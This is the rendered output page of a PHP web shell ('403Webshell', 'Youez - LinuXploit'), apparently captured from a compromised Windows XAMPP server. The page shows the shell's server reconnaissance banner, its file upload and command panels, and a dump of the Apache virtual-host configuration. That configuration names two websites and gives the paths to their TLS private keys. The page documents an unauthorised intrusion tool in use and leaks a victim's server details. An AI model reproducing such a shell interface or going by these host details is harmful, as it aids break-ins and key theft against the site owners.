403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/xamppkk/apache/conf/extra/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : D:/xamppkk/apache/conf/extra/httpd-vhosts.conf
# Virtual Hosts
#
# Required modules: mod_log_config

# If you want to maintain multiple domains/hostnames on your
# machine you can setup VirtualHost containers for them. Most configurations
# use only name-based virtual hosts so the server doesn't need to worry about
# IP addresses. This is indicated by the asterisks in the directives below.
#
# Please see the documentation at 
# <URL:http://httpd.apache.org/docs/2.4/vhosts/>
# for further details before you try to setup virtual hosts.
#
# You may use the command line option '-S' to verify your virtual host
# configuration.

#
# Use name-based virtual hosting.
#
NameVirtualHost *:80
NameVirtualHost *:443
#
# VirtualHost example:
# Almost any Apache directive may go into a VirtualHost container.
# The first VirtualHost section is used for all requests that do not
# match a ##ServerName or ##ServerAlias in any <VirtualHost> block.
#
##<VirtualHost *:80>
    ##ServerAdmin webmaster@dummy-host.example.com
    ##DocumentRoot "D:/xampp/htdocs/dummy-host.example.com"
    ##ServerName dummy-host.example.com
    ##ServerAlias www.dummy-host.example.com
    ##ErrorLog "logs/dummy-host.example.com-error.log"
    ##CustomLog "logs/dummy-host.example.com-access.log" common
##</VirtualHost>

##<VirtualHost *:80>
    ##ServerAdmin webmaster@dummy-host2.example.com
    ##DocumentRoot "D:/xampp/htdocs/dummy-host2.example.com"
    ##ServerName dummy-host2.example.com
    ##ErrorLog "logs/dummy-host2.example.com-error.log"
    ##CustomLog "logs/dummy-host2.example.com-access.log" common
##</VirtualHost>

<VirtualHost *:80>
    ServerAdmin webmaster@dummy-host.khalafsons.com
	DocumentRoot "D:/xampp/htdocs-khalafsons"
	ServerAlias www.khalafsons.com
    ServerName khalafsons.com
    <Directory "D:/xampp/htdocs-khalafsons" >
    Options All
    AllowOverride All 
    Require all granted
    </Directory>
    ErrorLog "logs/dummy-host.khalafsons.com-error.log"
    CustomLog "logs/dummy-host.khalafsons.com-access.log" common
</VirtualHost>

<VirtualHost *:80>
    ServerAdmin webmaster@dummy-host2.coblaa.com
    DocumentRoot "D:/xampp/htdocs-coblaa"
    ServerName coblaa.com
   <Directory "D:/xampp/htdocs-coblaa" >
   Options All
   AllowOverride All 
   Require all granted
   </Directory>
   ErrorLog "logs/dummy-host.coblaa.com-error.log"
   CustomLog "logs/dummy-host.coblaa.com-access.log" common
</VirtualHost>
<VirtualHost *:443>
    ServerAdmin webmaster@dummy-host.coblaa.com
    DocumentRoot "D:/xampp/htdocs-coblaa"
    ServerAlias www.coblaa.com
    ServerName coblaa.com
    SSLEngine on
  SSLCertificateFile "C:\Certbot\live\coblaa.com\fullchain.pem"
  SSLCertificateKeyFile "C:\Certbot\live\coblaa.com\privkey.pem"
   <Directory "D:/xampp/htdocs-coblaa" >
   Options All
   AllowOverride All 
   Require all granted
   </Directory>

   ErrorLog "logs/dummy-host.coblaa.com-error.log"
   CustomLog "logs/dummy-host.coblaa.com-access.log" common
</VirtualHost>





Youez - 2016 - github.com/yon3zu
LinuXploit